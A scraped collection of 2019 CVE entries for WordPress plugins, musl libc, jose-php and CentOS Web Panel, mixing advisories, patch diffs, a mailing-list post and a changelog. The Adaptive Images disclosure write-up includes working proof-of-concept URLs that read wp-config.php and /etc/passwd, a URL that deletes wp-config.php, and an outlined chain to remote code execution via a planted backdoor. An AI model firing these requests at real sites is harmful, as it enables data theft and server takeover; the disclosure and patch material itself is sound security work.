The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.

CVE-2019-14787: Newsletters

The codection "Import users from CSV with meta" plugin before 1.14.2.2 for WordPress allows wp-admin/admin-ajax.php?action=acui_delete_attachment CSRF.

CVE-2019-14683: Import and export users and customers

The woo-variation-swatches (aka Variation Swatches for WooCommerce) plugin 1.0.61 for WordPress allows XSS via the wp-admin/admin.php?page=woo-variation-swatches-settings tab parameter.

CVE-2019-14774

The PHP JOSE Library by Gree Inc. before version 2.2.1 is vulnerable to key confusion/algorithm substitution in the JWS component resulting in bypassing the signature verification via crafted tokens.

@@ -122,14 +122,20 @@ private function \_verify($public\_key\_or\_secret, $expected\_alg = null) { $segments = explode('.', $this\->raw); $signature\_base\_string = implode('.', array($segments\[0\], $segments\[1\])); if (!$expected\_alg) { \# NOTE: might better to warn here $expected\_alg = $this\->header\['alg'\]; $using\_autodetected\_alg = true; } switch ($expected\_alg) { case 'HS256': case 'HS384': case 'HS512': return $this\->signature === hash\_hmac($this\->digest(), $signature\_base\_string, $public\_key\_or\_secret, true); if ($using\_autodetected\_alg) { throw new JOSE\_Exception\_UnexpectedAlgorithm( 'HMAC algs MUST be explicitly specified as $expected\_alg' ); } $hmac\_hash = hash\_hmac($this\->digest(), $signature\_base\_string, $public\_key\_or\_secret, true); return hash\_equals($this\->signature, $hmac\_hash); case 'RS256': case 'RS384': case 'RS512':

CVE-2016-5431: explicit alg check & secure hash comparison · nov/jose-php@1cce55e

musl libc through 1.1.23 has an x87 floating-point stack adjustment imbalance, related to the math/i386/ directory. In some cases, use of this library could introduce out-of-bounds writes that are not present in an application's source code.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 5 Aug 2019 20:05:39 -0400
From: Rich Felker <dalias@...c.org>
To: oss-security@...ts.openwall.com
Cc: musl@...ts.openwall.com
Subject: Re: CVE request: musl libc 1.1.23 and earlier x87 float stack
 imbalance

On Mon, Aug 05, 2019 at 07:27:37PM -0400, Rich Felker wrote:
> I've discovered a flaw in musl libc's arch-specific math assembly code
> for i386, whereby at least the log1p function and possibly others
> return with more than one item on the x87 stack. This can lead to x87
> stack overflow in the execution of subsequent math code, causing it to
> incorrectly produce a NAN in place of the actual result. If floating
> point results are used in flow control, this can lead to runaway wrong
> code execution. For example, in Python (version 3.6.8 tested), at
> least one code path of the dtoa function becomes an infinite loop
> performing what's effectively an unbounded-length memset when entered
> under such a condition.
> 
> This bug is potentially exploitable in software which calls affected
> math functions with inputs under user control. Impact depends on how
> the application handles the ABI-violating x87 state; in Python it
> seems to be limited to producing a crash.
> 
> The bug is present in all versions after 0.9.12, up through the
> current (1.1.23) release. Only 32-bit x86 systems (aka IA32, musl's
> "i386" arch) are affected. Users of other archs, including x86\_64, can
> safely ignore this issue.
> 
> Affected users are advised to apply the following patch:
> 
> https://git.musl-libc.org/cgit/musl/patch/?id=f3ed8bfe8a82af1870ddc8696ed4cc1d5aa6b441

The patch contains an error that was missed for unknown reasons,
probably failure to rebuild a file. I'm attaching an aggregate patch
that works. Alternaatively, these two commits can be applied:

https://git.musl-libc.org/cgit/musl/patch/?id=f3ed8bfe8a82af1870ddc8696ed4cc1d5aa6b441
https://git.musl-libc.org/cgit/musl/patch/?id=6818c31c9bc4bbad5357f1de14bedf781e5b349e

**View attachment "**x87\_stack\_bug.diff**" of type "**text/plain**" (3105 bytes)**

Powered by blists - more mailing lists

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-14697: Re: CVE request: musl libc 1.1.23 and earlier x87 float stack imbalance

A SQL injection vulnerability exists in the 10Web Photo Gallery plugin before 1.5.31 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via filemanager/model.php.

Timestamp:

07/25/2019 09:33:24 AM (4 years ago)

webdorado

Message:

Fixed: security issue  

Location:

photo-gallery/trunk

Files:

  

*   filemanager/model.php (2 diffs)
*   photo-gallery.php (2 diffs)
*   readme.txt (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **photo-gallery/trunk/filemanager/model.php**
    
    r2087021
    
    r2128378
    
     
    
    50
    
    50
    
            $orderby = $params\['orderby'\];
    
    51
    
    51
    
            $order = $params\['order'\];
    
     
    
    52
    
        if ( $orderby != 'size' && $orderby != 'name' ) {
    
     
    
    53
    
          $orderby = 'date\_modified';
    
     
    
    54
    
        }
    
     
    
    55
    
        if ( $order != 'asc' ) {
    
     
    
    56
    
          $order = 'desc';
    
     
    
    57
    
        }
    
    52
    
    58
    
            $search = $params\['search'\];
    
    53
    
    59
    
            $page\_num = $params\['page\_num'\];
    
    …
    
    …
    
     
    
    149
    
    155
    
            $orderby = $params\['orderby'\];
    
    150
    
    156
    
            $order = $params\['order'\];
    
     
    
    157
    
        if ( $orderby != 'size' && $orderby != 'name' ) {
    
     
    
    158
    
          $orderby = 'date\_modified';
    
     
    
    159
    
        }
    
     
    
    160
    
        if ( $order != 'asc' ) {
    
     
    
    161
    
          $order = 'desc';
    
     
    
    162
    
        }
    
    151
    
    163
    
    152
    
    164
    
            $query  = ' SELECT \* FROM \`' . $wpdb->prefix . 'bwg\_file\_paths\`';
    
*   **photo-gallery/trunk/photo-gallery.php**
    
    r2120867
    
    r2128378
    
     
    
    4
    
    4
    
     \* Plugin URI: https://10web.io/plugins/wordpress-photo-gallery/?utm\_source=photo\_gallery&utm\_medium=free\_plugin
    
    5
    
    5
    
     \* Description: This plugin is a fully responsive gallery plugin with advanced functionality.  It allows having different image galleries for your posts and pages. You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags.
    
    6
    
     
    
     \* Version: 1.5.30
    
     
    
    6
    
     \* Version: 1.5.31
    
    7
    
    7
    
     \* Author: Photo Gallery Team
    
    8
    
    8
    
     \* Author URI: https://10web.io/plugins/?utm\_source=photo\_gallery&utm\_medium=free\_plugin
    
    …
    
    …
    
     
    
    85
    
    85
    
        $this->plugin\_url = plugins\_url(plugin\_basename(dirname(\_\_FILE\_\_)));
    
    86
    
    86
    
        $this->main\_file = plugin\_basename(\_\_FILE\_\_);
    
    87
    
     
    
        $this->plugin\_version = '1.5.30';
    
    88
    
     
    
        $this->db\_version = '1.5.30';
    
     
    
    87
    
        $this->plugin\_version = '1.5.31';
    
     
    
    88
    
        $this->db\_version = '1.5.31';
    
    89
    
    89
    
        $this->prefix = 'bwg';
    
    90
    
    90
    
        $this->nicename = \_\_('Photo Gallery', $this->prefix);
    
*   **photo-gallery/trunk/readme.txt**
    
    r2120867
    
    r2128378
    
     
    
    4
    
    4
    
    Requires at least: 3.4
    
    5
    
    5
    
    Tested up to: 5.2
    
    6
    
     
    
    Stable tag: 1.5.30
    
     
    
    6
    
    Stable tag: 1.5.31
    
    7
    
    7
    
    License: GPLv2 or later
    
    8
    
    8
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    282
    
    282
    
    283
    
    283
    
    \== Changelog ==
    
     
    
    284
    
     
    
    285
    
    \= 1.5.31 =
    
     
    
    286
    
    \* Fixed: Vulnerability.
    
    284
    
    287
    
    285
    
    288
    
    \= 1.5.30 =
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2019-14313: Changeset 2128378 – WordPress Plugin Repository

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.840, File and Directory Information Exposure in filemanager allows attackers to enumerate users and check for active users of the application by reading /tmp/login.log.

**New Version (coming soon)**  
_Now in 2019, we release new version multiple times a week and sometimes even multiple times per day._

**Version 0.9.8.651 – 0.9.8.747 (released 21/05/2018-09/12/2018 )**

Security  
– **\[New Feature\]** Implementation of anti XSS token for the GUI

New WebServers  
– **\[New Feature\]** Define per domain webservers, now you can use different webservers per domain  
– **\[New Feature\]** prepared for AI-Robot so Artificial Intelligence can take over the control on it  
– **\[New Feature\]** Define global default server vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Define per domain vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Error detection in vhost build for apache/nginx/varnish/php-fpm  
– **\[UPDATE\]** latest versions of the webservers apache/nginx/varnish  
– **\[UPDATE\]** AutoSSL: more stable domain validation check

New Varnish  
– **\[New Feature\]** Varnish makes your site look like static html, it doesn’t need to run php-cgi/php-fpm for each request.  
– **\[New Feature\]** Website continues to work as cached even if apache is down  
– **\[New Feature\]** more advanced templates with better cache in memory  
– **\[New Feature\]** per domain templates and configs which you can modify and build your own  
– **\[New Feature\]** it can run now as a cache server in front of Tomcat,nodejs,ruby…

AI-Robot (Artificial Intelligence for cwp)  
Artificial intelligence integration, we have integrated “AI-Robot” artificial intelligence system which has started to learn system issues and soon it will be able to handle errors and automatically recover the system services.

PHP/PHP-FPM  
– **\[New Feature\]** PHP-FPM default setup with cache and with fastest unix sockets  
– **\[New Feature\]** PHP Pecl Manager for all PHP builders  
– **\[New Feature\]** PHP-FPM Selector with many custom options (automatic install of dependencies)  
– **\[New Feature\]** Predefined vhost templates for better performances  
– **\[New Feature\]** Custom templates for php-fpm, you can use custom per domain  
– **\[UPDATE\]** latest versions of the PHP  
– **\[UPDATE\]** New PHP 7.3.0, please use only for beta testing  
– **\[UPDATE\]** for all php builders automatic detection if build is already running  
– **\[UPDATE\]** PHP Selector with many versions and options (automatic install of dependencies)

Other Modules  
– **\[New Feature\]** New DNS Zone Editor with error detection and now much more advanced  
– **\[New Feature\]** New Mod Security Manager  
– **\[New Feature\]** Automatic update manager for 3rdParty scripts like, roundcube, phpmyadmin…  
– **\[New Feature\]** User notifications  
– **\[UPDATE\]** Improved cwp to cwp migration tool, we are still working on it to make it even better  
– **\[UPDATE\]** MySQL Manager: edit user password

**User Panel \[New Design\]**  
– **\[SECURITY\]** Implementation of anti XSS token for the GUI  
– **\[New Feature\]** New Advanced File Manager  
– **\[New Feature\]** New Modern Design  
– **\[New Feature\]** Search integration for menu and icons  
– **\[New Feature\]** Sound alerts  
– **\[New Feature\]** Pagination for all modules  
– **\[New Feature\]** Advanced editor integration for php.ini  
– **\[UPDATE\]** Cron Manager error detection  
\* We have also fixed many other reported bugs

**Version 0.9.8.448 – 0.9.8.651 (released 08/02/2018-21/05/2018)**  
– **\[New Feature\]** cgroups for centos 7 (limit resource per user, eg. set cpu limit to 50%)  
– **\[New Feature\]** Main left menu search option  
– **\[New Feature\]** Manage User crons from the admin panel  
– **\[New Feature\]** New Notifications handler with email alerts  
– **\[New Feature\]** New Ulimits Module -Show all user processes and limits (good for debugging)  
– **\[New Feature\]** Monit Monitoring (advanced tool for monitoring server services and resources)  
– **\[New Feature\]** MySQL Manager now has security and optimization tests integrated  
– **\[New Feature\]** Security Tools – Maldet Scan – Scan websites for malware  
– **\[New Feature\]** Security Tools – RKHunter Scan – Scan server for rootkits, backdoors  
– **\[New Feature\]** Security Tools – Lynis Scan – Scan server for system hardening  
– **\[New Feature\]** Security Tools – Symlink scan – Scan user accounts for symlinks  
– **\[UPDATE\]** New SSL Manager with additional auto-download for chain certificates  
– **\[UPDATE\]** Latest PHP versions (used in switcher/selector)  
– **\[UPDATE\]** Apache latest version rpm + rebuilder/compiler  
– **\[UPDATE\]** New Security checks in the Security Advisor via new notifications  
– **\[BUGFIX\]** Fixed all reported bugs with the cpanel account migration  
– **\[BUGFIX\]** Fixed bugs in the account transfer tool  
– **\[BUGFIX\]** Fixed bugs in the Mail server manager related to rebuild  
– **\[BUGFIX\]** Fixed bugs with API

**User Panel \[\]**  
– **\[SECURITY\]** Big security update for user panel, many issues have been resolved  
– **\[New Feature\]** AutoSSL- Install/remove Free SSL from the user panel  
– **\[UPDATE\]** Improved DNS zone editor

\* We have also fixed many other reported bugs

**Version 0.9.8.359 – 0.9.8.448** (released 29/09/2017-07/02/2018)  
– **\[UPDATE\]** PHP 7.2  
– **\[UPDATE\]** New admin panel design upgrade  
– **\[New Feature\]** Theme manager for User Panel  
– **\[New Feature\]** Language manager for User Panel  
– **\[New Feature\]** New cPanel migration tool running in background  
– **\[New Feature\]** New CWP to CWP migration tool  
– **\[New Feature\]** New Advanced Backup Manager  
– **\[New Feature\]** New Advanced API Manager with permissions

**New user Panel** (demo)  
– **\[New Feature\]** All new, too many things to have them listed here, you simply need to check it!  
Fixed many many other reported bugs

**Version 0.9.8.334 – 0.9.8.359** (released 26/06-29/09/2017)  
– **\[UPDATE\]** Added Apache 2.4.26, 2.4.27  
– **\[UPDATE\]** PHP 5.6.31, 7.0.21, 7.0.22, 7.0.23, 7.0.24, 7.1.6, 7.1.7, 7.1.9, 7.1.10  
– **\[UPDATE\]** PHP selector delete unwanted php version with single click  
– **\[UPDATE\]** AutoSSL: manualy start and force auto renewal  
– **\[New Feature\]** Included manager for new user panel compatibility

– **\[BUGFIX\]** IonCube installer fixed issue with php 7.0 & 7.1  
– **\[BUGFIX\]** Zendguard loader5.5, 5.6 improved installer  
– **\[BUGFIX\]** AutoSSL reported bugs fixed  
– **\[BUGFIX\]** Improved security  
Fixed many other reported bugs

**Version 0.9.8.315 – 0.9.8.333** (released 28/04-25/06/2017)  
– **\[UPDATE\]** detailed cleanup of removed accounts  
– **\[UPDATE\]** yum manager improvement  
– **\[UPDATE\]** New PHP versions added 7.0.20 and 7.1.5  
– **\[UPDATE\]** php selector new versions of php  
– **\[UPDATE\]** apache 2.4.26 (has security updates)  
– **\[New Feature\]** new ftp manager for admin  
– **\[New Feature\]** bandwidth monitor (incoming/outgoing for all interfaces)

– **\[BUGFIX\]** php switcher bug fix  
– **\[BUGFIX\]** autossl bugfix  
– **\[BUGFIX\]** mod security installer bug fix  
– **\[BUGFIX\]** vhost rebuild bug fix  
– **\[BUGFIX\]** mail queue module bug fix  
– **\[BUGFIX\]** mail explorer module bug fix  
Fixed many other reported bugs

**Version 0.9.8.291 – 0.9.8.314** (released 23/03-28/04/2017)  
– **\[UPDATE\]** New PHP versions added 7.0.18 and 7.1.4  
– **\[UPDATE\]** Improved SSL Manager (fixed autoSSL bugs)  
– **\[UPDATE\]** Improved backups (now weekly and monthly use hard links and can reduce total backup size up to 65%)  
– **\[New Feature\]** Ajax disk usage checker (check your disk space usage per folder)  
– **\[New Feature\]** New Varnish configuration editor  
– **\[New CWPpro\]** Yum Package and Repository Manager  
– **\[SECURITY\]** SECURITY BUG FIXED  
Prevention of Cross-site Scripting (XSS) Attack ​by Esmaeil Rahimian (Security Research from SecureHost) Rahimian@securehost.co  
Fixed many other reported bugs

**Version 0.9.8.266 – 0.9.8.290** (released 01-22/03/2017)  
– **\[BUGFIX\]** ioncube update scripts  
– **\[BUGFIX\]** sysstat graph errors  
– **\[BUGFIX\]** PHP Selector fixed php 7  
– **\[BUGFIX\]** Advanced File Manager bugs  
– **\[BUGFIX\]** Mail Server rebuild  
– **\[BUGFIX\]** SSL redirection for cwp services  
– **\[BUGFIX\]** Fixed security advisor multiple messages  
– **\[UPDATE\]** Php Switcher new additional modules and new php versions  
– **\[UPDATE\]** PHP Selector update of all php versions and added php 7.0, 7.1  
– **\[UPDATE\]** SSL Cert Manager now with more detailed info from the certificate files  
– **\[New Feature\]** AutoSSL option when creating new account, domain or subdomain from admin panel  
– **\[New Feature\]** AutoSSL for Hostname  
– **\[New Feature\]** Nice and Fast Ajax upgrade for list accounts, domains and subdomains.  
– **\[New Feature\]** New Varnish configuration editor  
– **\[CWPpro\]** Yum, number of available packages upgrades at login into cwp

**Version 0.9.8.250 – 0.9.8.265** (released 21-28/02/2017)  
– **\[New Feature\]** Sysstat graphs  
– **\[UPDATE\]** Higher grade for apache SSL  
– **\[UPDATE\]** PHP Switcher\_v2 Configuration Upgrade and Bugs Fixed  
– **\[BUGFIX\]** File Manager bug fixed, and few smaller bug in the gui

**Version 0.9.8.248 – 0.9.8.249** (released 21/02/2017)  
– **\[UPDATE\]** PHP Switcher added extensions: intl, pspell, tidy, wddx  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.240 – 0.9.8.247** (released 17/02/2017)  
– **\[New Feature\]** NEW friendly PHP Version Switcher with many addons and more to come…  
– **\[UPDATE\]** Update of PHP versions: 7.1.2, 7.0.16, 5.6.30  
– **\[Old Removed\]** Old PHP Version Switcher removed from the left menu but still exists.  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.239** (released 13/02/2017)  
– **\[BUGFIX\]** Fixed bug with softaculous remove mysql user.

**Version 0.9.8.237 & 0.9.8.238** (released 11/02/2017)  
– **\[New Feature\]** LiteSpeed Enterprise integration with CWP

**13/02/2017**  
…we were working very hard to make CWP work with CentOS 7 so we have done many changes are unfortunately there is no any info what was done before in which version.

CVE-2019-13385: ChangeLog for CentOS 7 | Control Web Panel

WebAppick WooCommerce Product Feed 2.2.18 and earlier is affected by: Cross Site Scripting (XSS). The impact is: XSS to RCE via editing theme files in WordPress. The component is: admin/partials/woo-feed-manage-list.php:63. The attack vector is: Administrator must be logged in.

CVE-2019-1010124

An Arbitrary File Deletion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to delete arbitrary files via the $REQUEST['adaptive-images-settings'] parameter in adaptive-images-script.php.

**LFI (Local file inclusion), Arbitrary file deletion and RCE in Adaptive Images for WordPress plugin.**

This plugin, developed by Nevma is used to serve images in Wordpress based on device resolution, allowing an on-the-fly resize. It is useful to decrease the page load for mobile devices.

The analyzed version is **0.6.66** on a fresh WordPress installation 5.2.2.

Due to an exposed variable an unauthenticated attacker can exploit a vulnerability that can lead to a LFI (Local File Inclusion) and to Arbitrary File Deletion.

Sensible system and Wordpress file can be easily exfiltrated and the two vulnerabilities can be used to obtain RCE (Remote Command Execution).

****INTRO****

**Adaptive Images for WordPress** serves images through a PHP script, adaptive-images-script.php.

All requests made to image assets that appear in specific folders (the plugin settings allow to change these folders) are redirected through this script that eventually manipulate the image before serving it.

At **line 877** the plugin settings are collected:

      $settings = adaptive_images_script_get_settings();
    

This method at **line 62** checks if the $_REQUEST['adaptive-images-settings'] is present and if not it overrides and composes it according the default configuration.

    
        function adaptive_images_script_get_settings () {
    
            // Setup script settings.
    
            if ( ! isset( $_REQUEST['adaptive-images-settings'] ) ) {
    
        ...
    
        // Setup script settings and save the in request scope.
    
        $_REQUEST['adaptive-images-settings'] = array(
            'debug'          => $debug,
            'resolutions'    => $resolutions,
            'cache_dir'      => $cache_dir,
            'jpg_quality'    => $jpg_quality,
            'png8'           => $png8,
            'sharpen'        => $sharpen,
            'watch_cache'    => $watch_cache,
            'browser_cache'  => $browser_cache,
            'request_uri'    => $request_uri,
            'source_file'    => $source_file,
            'wp_content'     => $wp_content_dir,
            'client_width'   => $client_width,
            'hidpi'          => $hidpi,
            'pixel_density'  => $pixel_density,
            'resolution'     => $resolution
        );
    

At the end of the method the function simply return the $_REQUEST['adaptive-images-settings'] variable.

      return $_REQUEST['adaptive-images-settings'];
    

This logic allows any visitor to set and override the $_REQUEST['adaptive-images-settings'] just passing it to the request.

**Having control on this variable allows an attacker to exploit two major vulnerabilities.**

The parameter $_REQUEST['adaptive-images-settings']['source_file'] allows an attacker to set in an arbitrary way the file requested that will be served from the script.

Even if it is not possible to manipulate the Content-Type header, the script will generate a malformed image that contains the requested file.

This vulnerability in combination with other server misconfiguration can lead to RCE (Remote Command Execution) using log poisoning technique, /proc/self/environ technique and others.

****POC****

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd

_The image used to trigger the vulnerability should exist._

****Arbitrary File Deletion****

The plugin contains a cache mechanism that allows the generated resized images to be saved and cached to prevent excessive resources usage.

As every cache mechanism a file should be deleted if the source is newer than the cache file.  
**This feature can be abused to delete an arbitrary file accessible from the Wordpress installation.**

On **line 977** is called the function that removes a stale cache image:

        // Locate cached image.
    
        $cache_file = $settings['wp_content'] . '/' . $settings['cache_dir'] . '/' . $settings['resolution'] . $settings['request_uri'];
    
    
    
        // Check if cached image if stale and relete it if so.
    
        if ( file_exists( $cache_file ) ) {
    
            // Check if cached image is stale and delete it if so.
    
            if ( $settings['watch_cache'] ) {
    
                adaptive_images_delete_stale_cache_image( $settings['source_file'], $cache_file, $settings['resolution'] );
    
            }
    
        }
    

Every variable used in this code is controlled by the aforementioned $_REQUEST['adaptive-images-settings'] variable.

The adaptive_images_delete_stale_cache_image function just checks if the $cache_files exists and if it is newer than the original one.

The only condition to successfully exploit this vulnerability is that the file that we pass as $source_file is newer than the file that we pass as $cache_file.

        function adaptive_images_delete_stale_cache_image ( $source_file, $cache_file, $resolution ) {
    
            if ( file_exists( $cache_file ) ) {
    
                // Check image file timestamp.
    
                if ( filemtime( $cache_file ) >= filemtime( $source_file ) ) {
    
                    return $cache_file;
    
                }
    
                unlink( $cache_file );
            }
    
        }
    

****POC****

Using relative paths we set as $source_file an image (or any other file) that exists in the website and as $cache_file (our target) the wp-config.php.  
In this way it is almost certain that the image is more recent than the target file.

Some other variables should be manipulated to pass some checks and build the correct path of the target file.

_This POC deletes the wp-config.php, test it carefully._

http://wp-vulnerable/wp-content/uploads/2019/07/image.jpeg?adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1

****BONUS: LFI + Arbitrary file deletion = RCE****

Combining the previous two vulnerabilities an attacker can obtain a bold (and not really stealth) Remote Code Execution on the server.

This is the exploit process:

1.  Dump the current wp-config.php
2.  Delete the current wp-config.php
3.  Install a fake WordPress alongside the real one (DB credentials are known, a random db\_prefix should be chosen to not overwrite the current installation).
4.  Log in the fake WordPress to patch a plugin or theme file to set up a backdoor
5.  Use the backdoor to restore the previous wp-config.php and remove the fake WordPress installation from the database.

This process can be automated and executed in less than 1 minute. During the process the website will not be reachable (exploit).

****Time Line****

Date

What

2019/07/08

Vulnerability reported to plugin developer company using the email found in code. No response.

2019/07/11

Vulnerability reported directly to plugin developer.

2019/07/11

The vulnerability was verified by the plugin developer.

2019/07/11

A fix was released in version 0.6.7.

2019/07/19

Public disclosure.

Special thanks to Takis @ Nevma for his availability and for the quick release of the fix.

CVE-2019-14206: Adaptive images for Wordpress 0.6.66: LFI, arbitrary file deletion and RCE.

A SQL injection vulnerability exists in WPEverest Everest Forms plugin for WordPress through 1.4.9. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via includes/evf-entry-functions.php

@@ -75,55 +75,45 @@ function evf\_search\_entries( $args ) { ) );  
$statuses = array\_keys( evf\_get\_entry\_statuses() ); $valid\_fields = array( 'date', 'form\_id', 'title', 'status' );  
// Check if form ID is valid for entries. if ( ! array\_key\_exists( $args\['form\_id'\], evf\_get\_all\_forms() ) ) { return array(); }  
$orderby = isset( $args\['orderby'\] ) ? sanitize\_key( $args\['orderby'\] ) : 'entry\_id'; $order = "ORDER BY {$orderby} " . esc\_sql( strtoupper( $args\['order'\] ) ); $limit = -1 < $args\['limit'\] ? $wpdb\->prepare( 'LIMIT %d', $args\['limit'\] ) : ''; $offset = 0 < $args\['offset'\] ? $wpdb\->prepare( 'OFFSET %d', $args\['offset'\] ) : ''; $status = ! empty( $args\['status'\] ) ? "AND \`status\` = '" . sanitize\_key( $args\['status'\] ) . "'" : ''; $search = ! empty( $args\['search'\] ) ? "AND \`meta\_value\` LIKE '%" . $wpdb\->esc\_like( sanitize\_text\_field( $args\['search'\] ) ) . "%'" : ''; $include = ! empty( $args\['form\_id'\] ) ? "AND \`form\_id\` = '" . absint( $args\['form\_id'\] ) . "'" : ''; $exclude = ''; $date\_created = ''; $date\_modified = '';  
if ( ! empty( $args\['after'\] ) || ! empty( $args\['before'\] ) ) { $args\['after'\] = empty( $args\['after'\] ) ? '0000-00-00' : $args\['after'\]; $args\['before'\] = empty( $args\['before'\] ) ? current\_time( 'mysql', 1 ) : $args\['before'\];  
$date\_created = "AND \`date\_created\_gmt\` BETWEEN STR\_TO\_DATE('" . esc\_sql( $args\['after'\] ) . "', '%Y-%m-%d %H:%i:%s') and STR\_TO\_DATE('" . esc\_sql( $args\['before'\] ) . "', '%Y-%m-%d %H:%i:%s')"; $query = array(); $query\[\] = "SELECT DISTINCT {$wpdb\->prefix}evf\_entries.entry\_id FROM {$wpdb\->prefix}evf\_entries INNER JOIN {$wpdb\->prefix}evf\_entrymeta WHERE {$wpdb\->prefix}evf\_entries.entry\_id = {$wpdb\->prefix}evf\_entrymeta.entry\_id";  
if ( ! empty( $args\['search'\] ) ) { $like = '%' . $wpdb\->esc\_like( $args\['search'\] ) . '%'; $query\[\] = $wpdb\->prepare( 'AND meta\_value LIKE %s', $like ); }  
if ( ! empty( $args\['modified\_after'\] ) || ! empty( $args\['modified\_before'\] ) ) { $args\['modified\_after'\] = empty( $args\['modified\_after'\] ) ? '0000-00-00' : $args\['modified\_after'\]; $args\['modified\_before'\] = empty( $args\['modified\_before'\] ) ? current\_time( 'mysql', 1 ) : $args\['modified\_before'\]; if ( ! empty( $args\['form\_id'\] ) ) { $query\[\] = $wpdb\->prepare( 'AND form\_id = %d', absint( $args\['form\_id'\] ) ); }  
$date\_modified = "AND \`date\_modified\_gmt\` BETWEEN STR\_TO\_DATE('" . esc\_sql( $args\['modified\_after'\] ) . "', '%Y-%m-%d %H:%i:%s') and STR\_TO\_DATE('" . esc\_sql( $args\['modified\_before'\] ) . "', '%Y-%m-%d %H:%i:%s')"; if ( ! empty( $args\['status'\] ) ) { $query\[\] = $wpdb\->prepare( 'AND \`status\` = %s', isset( $statuses\[ $args\['status'\] \] ) ? $statuses\[ $args\['status'\] \] : 'publish' ); }  
$query = trim( " SELECT DISTINCT {$wpdb\->prefix}evf\_entries.entry\_id FROM {$wpdb\->prefix}evf\_entries INNER JOIN {$wpdb\->prefix}evf\_entrymeta WHERE {$wpdb\->prefix}evf\_entries.entry\_id = {$wpdb\->prefix}evf\_entrymeta.entry\_id {$status} {$search} {$include} {$exclude} {$date\_created} {$date\_modified} {$order} {$limit} {$offset} " ); $orderby = in\_array( $args\['orderby'\], $valid\_fields, true ) ? $args\['orderby'\] : 'entry\_id'; $order = 'DESC' === strtoupper( $args\['order'\] ) ? 'DESC' : 'ASC'; $orderby\_sql = sanitize\_sql\_orderby( "{$orderby} {$order}" ); $query\[\] = "ORDER BY {$orderby\_sql}";  
if ( -1 < $args\['limit'\] ) { $query\[\] = $wpdb\->prepare( 'LIMIT %d', absint( $args\['limit'\] ) ); }  
if ( 0 < $args\['offset'\] ) { $query\[\] = $wpdb\->prepare( 'LIMIT %d', absint( $args\['offset'\] ) ); }  
$results = $wpdb\->get\_results( $query ); // WPCS: cache ok, DB call ok, unprepared SQL ok. // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared $results = $wpdb\->get\_results( implode( ' ', $query ), ARRAY\_A );  
$ids = wp\_list\_pluck( $results, 'entry\_id' );

Tag

#php